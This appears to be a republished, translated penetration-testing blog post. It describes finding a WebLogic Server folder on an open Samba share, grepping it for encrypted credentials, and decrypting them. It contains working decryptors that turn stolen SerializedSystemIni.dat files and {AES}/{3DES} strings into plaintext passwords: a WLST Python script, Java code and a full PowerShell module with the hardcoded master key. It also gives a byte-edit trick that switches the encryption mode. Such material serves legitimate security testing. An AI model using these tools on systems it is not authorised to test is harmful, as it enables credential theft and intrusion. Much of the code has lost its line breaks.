Decrypts the WebLogic Password

Source: Internet
Author: User
Tags argumentlist

Decrypts the WebLogic Password
Recently I met several Linux servers during penetration testing, with Samba sharing that is publicly accessible. In many cases, shared files have some interesting things. Whether it is user authentication information or sensitive files, they will be helpful to us. This time, I found a folder named "wls1035" in the shared folder. After carefully reviewing the entire folder, I found that it was a WebLogic Server. WebLogic is an Application server running java in Oracle. I don't know much about WebLogic. I have seen it in the enterprise environment, but I have not carefully checked its file structure. I tried to find some sensitive information.

user@box:~/wls1035# grep -R "password" *Binary file oracle_common/modules/oracle.jdbc_12.1.0/aqapi.jar matchesoracle_common/plugins/maven/com/oracle/maven/oracle-common/12.1.3/oracle-common-12.1.3.pom:    <!-- and password for your server here. -->user_projects/domains/mydomain/bin/startManagedWebLogic.sh:#  to your system password for no username and password prompt user_projects/domains/mydomain/bin/stopManagedWebLogic.sh:# WLS_PW         - cleartext password for server shutdownuser_projects/domains/mydomain/bin/stopWebLogic.sh:     if [ "${password}" != "" ] ; thenuser_projects/domains/mydomain/bin/stopWebLogic.sh:              wlsPassword="${password}"user_projects/domains/mydomain/bin/stopWebLogic.sh:echo "connect(${userID} ${password} url='${ADMIN_URL}', adminServerName='${SERVER_NAME}')" >>"shutdown-${SERVER_NAME}.py" user_projects/domains/mydomain/bin/startWebLogic.sh:    JAVA_OPTIONS="${JAVA_OPTIONS} -Dweblogic.management.password=${WLS_PW}"user_projects/domains/mydomain/bin/startWebLogic.sh:echo "*  password assigned to an admin-level user.  For *"user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:    if [ -n "$username" -a -n "$password" ]; thenuser_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       print_info "Investigating username: '$username' and password: '$password'"user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$password" >>"$NMBootFile.tmp"user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       unset username passworduser_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$Password" >>"$NMBootFile.tmp"user_projects/domains/mydomain/init-info/config-nodemanager.xml:  <nod:password>{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=</nod:password>user_projects/domains/mydomain/init-info/security.xml:  <user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user.">
The password is not displayed in plaintext, but encrypted in this way: {AES} WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332 + I = I tried to find more similar passwords:
user@box:~/wls1035# grep -R "{AES}" *user_projects/domains/mydomain/init-info/config-nodemanager.xml:  <nod:password>{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=</nod:password>user_projects/domains/mydomain/init-info/security.xml:  <user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user.">user_projects/domains/mydomain/init-info/security.xml:  <user name="supersecretuser" password="{AES}BQp5xBlvsy6889edpwXUZxCbx7crRc5+TNuZHSBl50A=">user_projects/domains/mydomain/servers/myserver/security/boot.properties:username={AES}/DG7VFmJODIZJoQGmqxU8OQfkZxiKLuHQ69vqYPgxyY=user_projects/domains/mydomain/servers/myserver/security/boot.properties:password={AES}Bqy44qL0EM4ZqIqxgIRQxXv1lg7PxZ7lI1DLlx7njts=user_projects/domains/mydomain/config/config.xml:    <credential-encrypted>{AES}Yl6eIijqn+zdATECxKfhW/42wuXD5Y+j8TOwbibnXkz/p4oLA0GiI8hSCRvBW7IRt/kNFhdkW+v908ceU75vvBMB4jZ7S/Vdj+p+DcgE/33j82ZMJbrqZiQ8CVOEatOL</credential-encrypted>user_projects/domains/mydomain/config/config.xml:    <node-manager-password-encrypted>{AES}+sSbNNWb5K1feAUgG5Ah4Xy2VdVnBkSUXV8Rxt5nxbU=</node-manager-password-encrypted>user_projects/domains/mydomain/config/config.xml:    <credential-encrypted>{AES}nS7QvZhdYFLlPamcgwGoPP7eBuS1i2KeFNhF1qmVDjf6Jg6ekiVZOYl+PsqoSf3C</credential-encrypted>
We probably know from the previous string that the password is encrypted by AES. In the old version of WebLogic, the password is encrypted by 3DES, for example, {3DES} JMRazF/vClP1WAgy1czd2Q = means we must have a decryption key. To better study the decryption method, I downloaded and installed my WebLogic Server. After google, I found a python script that can be easily decrypted. It is interesting that WebLogic comes with a script Tool named WLST (WebLogic Scripting Tool), which can be used to run python. It contains the encryption and decryption modules. We can run the following script to encrypt:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLSTInitializing WebLogic Scripting Tool (WLST) ...Welcome to WebLogic Server Administration Scripting ShellType help() for help on available commandswls:/offline> pw = encrypt('password')wls:/offline> print pw{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=
To decrypt the data, use the python script obtained from this article.
import osimport weblogic.security.internal.SerializedSystemIniimport weblogic.security.internal.encryption.ClearOrEncryptedServicedef decrypt(agileDomain, encryptedPassword):    agileDomainPath = os.path.abspath(agileDomain)    encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)    password = ces.decrypt(encryptedPassword)    print "Plaintext password is:" + passwordtry:    if len(sys.argv) == 3:        decrypt(sys.argv[1], sys.argv[2])    else:                   print "Please input arguments as below"                   print "                Usage 1: java weblogic.WLST decryptWLSPwd.py  "                   print "                Usage 2: decryptWLSPwd.cmd "                   print "Example:"                   print "                java weblogic.WLST decryptWLSPwd.py C:\Agile\Agile933\agileDomain {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="                   print "                decryptWLSPwd.cmd {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="except:    print "Exception: ", sys.exc_info()[0]    dumpStack()raise
Example:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST decrypt.py . "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="Initializing WebLogic Scripting Tool (WLST) ...Welcome to WebLogic Server Administration Scripting ShellType help() for help on available commandsPlaintext password is:Password1
This can be decrypted, but the only problem is that we must use it in the same domain of WebLogic. I think we can decrypt it without the WebLogic environment. First, I checked which class libraries were called by the python script for encryption and decryption. Import weblogic. security. internal. SerializedSystemIniimport weblogic. security. internal. encryption. ClearOrEncryptedService he calls the following interface functions:
encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)password = ces.decrypt(encryptedPassword)
The first line uses the domain path as the parameter. In our example, the path is/root/wls12130/user_projects/domains/mydomain. Through weblogic. security. internal. serializedSystemIni. the getEncryptionService method obtains the SerializedSystemIni. dat file. This file is generally located in the security folder, which contains the salt and key to help us encrypt and decrypt the password. With this file, we can decrypt it: I wrote a piece of java code:
public static String decryptAES(String SerializedSystemIni, String ciphertext) throws NoSuchAlgorithmException, InvalidKeySpecException, NoSuchPaddingException, InvalidAlgorithmParameterException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException, IOException {byte[] encryptedPassword1 = new BASE64Decoder().decodeBuffer(ciphertext);    byte[] salt = null;    byte[] encryptionKey = null;    String key = "0xccb97558940b82637c8bec3c770f86fa3a391a56";    char password[] = new char[key.length()];    key.getChars(0, password.length, password, 0);    FileInputStream is = new FileInputStream(SerializedSystemIni);    try {        salt = readBytes(is);        int version = is.read();        if (version != -1) {            encryptionKey = readBytes(is);            if (version >= 2) {                encryptionKey = readBytes(is);            }        }    } catch (IOException e) {    }    SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWITHSHAAND128BITRC2-CBC");    PBEKeySpec pbeKeySpec = new PBEKeySpec(password, salt, 5);    SecretKey secretKey = keyFactory.generateSecret(pbeKeySpec);    PBEParameterSpec pbeParameterSpec = new PBEParameterSpec(salt, 0);    Cipher cipher = Cipher.getInstance("PBEWITHSHAAND128BITRC2-CBC");    cipher.init(Cipher.DECRYPT_MODE, secretKey, pbeParameterSpec);    SecretKeySpec secretKeySpec = new SecretKeySpec(cipher.doFinal(encryptionKey), "AES");    byte[] iv = new byte[16];    System.arraycopy(encryptedPassword1, 0, iv, 0, 16);    byte[] encryptedPassword2 = new byte[16];    System.arraycopy(encryptedPassword1, 16, encryptedPassword2, 0, 16);    IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);    Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");    outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec, ivParameterSpec);    byte[] cleartext = outCipher.doFinal(encryptedPassword2);    return new String(cleartext, "UTF-8");}
Use the SerializedSystemIni. dat file as the first parameter, and the ciphertext to be decrypted as the second parameter. After execution, the plaintext password is successfully output. For better understanding, I decided not to use java, so I wrote a decryption program using powershell.
<#    Author: Eric Gruber 2015, NetSPI    .Synopsis    PowerShell script to decrypt WebLogic passwords    .EXAMPLE    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:\SerializedSystemIni.dat -CipherText "{3DES}JMRazF/vClP1WAgy1czd2Q=="    .EXAMPLE    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:\SerializedSystemIni.dat -CipherText "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="#>function Invoke-WebLogicPasswordDecryptor{    [CmdletBinding()]    Param    (        [Parameter(Mandatory = $true,        Position = 0)]        [String]        $SerializedSystemIni,        [Parameter(Mandatory = $true,        Position = 0)]        [String]        $CipherText,        [Parameter(Mandatory = $false,        Position = 0)]        [String]        $BouncyCastle    )    if (!$BouncyCastle)    {        $BouncyCastle = '.\BouncyCastle.Crypto.dll'    }    Add-Type -Path $BouncyCastle    $Pass = '0xccb97558940b82637c8bec3c770f86fa3a391a56'    $Pass = $Pass.ToCharArray()    if ($CipherText.StartsWith('{AES}'))    {        $CipherText = $CipherText.TrimStart('{AES}')    }    elseif ($CipherText.StartsWith('{3DES}')){        $CipherText = $CipherText.TrimStart('{3DES}')    }    $DecodedCipherText = [System.Convert]::FromBase64String($CipherText)    $BinaryReader = New-Object -TypeName System.IO.BinaryReader -ArgumentList ([System.IO.File]::Open($SerializedSystemIni, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite))    $NumberOfBytes = $BinaryReader.ReadByte()    $Salt = $BinaryReader.ReadBytes($NumberOfBytes)    $Version = $BinaryReader.ReadByte()    $NumberOfBytes = $BinaryReader.ReadByte()    $EncryptionKey = $BinaryReader.ReadBytes($NumberOfBytes)    if ($Version -ge 2)    {        $NumberOfBytes = $BinaryReader.ReadByte()        $EncryptionKey = $BinaryReader.ReadBytes($NumberOfBytes)        $ClearText = Decrypt-AES -Salt $Salt -EncryptionKey $EncryptionKey -Pass $Pass -DecodedCipherText $DecodedCipherText    }    else    {        $ClearText = Decrypt-3DES -Salt $Salt -EncryptionKey $EncryptionKey -Pass $Pass -DecodedCipherText $DecodedCipherText    }    Write-Host "Password:" $ClearText}function Decrypt-AES{    param    (        [byte[]]        $Salt,        [byte[]]        $EncryptionKey,        [char[]]        $Pass,        [byte[]]        $DecodedCipherText    )    $EncryptionCipher = 'AES/CBC/PKCS5Padding'    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'    $IV = New-Object -TypeName byte[] -ArgumentList 16    [array]::Copy($DecodedCipherText,0,$IV, 0 ,16)    $CipherText = New-Object -TypeName byte[] -ArgumentList ($DecodedCipherText.Length - 16)    [array]::Copy($DecodedCipherText,16,$CipherText,0,($DecodedCipherText.Length - 16))    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher,$Salt,5)    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher,$Pass,$AlgorithmParameters)    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)    $KeyCipher.Init($false, $CipherParameters)    $Key = $KeyCipher.DoFinal($EncryptionKey)    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter , $IV)    $Cipher.Init($false, $ParametersWithIV)    $ClearText = $Cipher.DoFinal($CipherText)    [System.Text.Encoding]::ASCII.GetString($ClearText)}function Decrypt-3DES{    param    (        [byte[]]        $Salt,        [byte[]]        $EncryptionKey,        [char[]]        $Pass,        [byte[]]        $DecodedCipherText    )    $EncryptionCipher = 'DESEDE/CBC/PKCS5Padding'    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'    $IV = New-Object -TypeName byte[] -ArgumentList 8    [array]::Copy($Salt,0,$IV, 0 ,4)    [array]::Copy($Salt,0,$IV, 4 ,4)    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher,$Salt,5)    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher,$Pass,$AlgorithmParameters)    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)    $KeyCipher.Init($false, $CipherParameters)    $Key = $KeyCipher.DoFinal($EncryptionKey)$Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter , $IV)    $Cipher.Init($false, $ParametersWithIV)    $ClearText = $Cipher.DoFinal($DecodedCipherText)    [System.Text.Encoding]::ASCII.GetString($ClearText)}Export-ModuleMember -Function Invoke-WebLogicPasswordDecryptor
Below is the test
PS C:\> Import-Module .\Invoke-WebLogicDecrypt.psm1PS C:\> Invoke-WebLogicDecrypt -SerializedSystemIni "C:\SerializedSystemIni.dat" -CipherText "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="Password1
I also added a tip for later versions of WebLogic. If your WebLogic is using the new version of AES encryption, you can modify the SerializedSystemIni. the sixth byte of the dat file to replace the encryption method. When the character is 02, It is AES encryption: Output in WLST:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLSTInitializing WebLogic Scripting Tool (WLST) ...Welcome to WebLogic Server Administration Scripting ShellType help() for help on available commandswls:/offline> pw = encrypt('password')wls:/offline> print pw{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=
When it is changed to 01, 3DES encryption is Enabled:
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLSTInitializing WebLogic Scripting Tool (WLST) ...Welcome to WebLogic Server Administration Scripting ShellType help() for help on available commandswls:/offline> pw = encrypt("Password1")wls:/offline> print pw                 {3DES}vNxF1kIDgtydLoj5offYBQ==

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.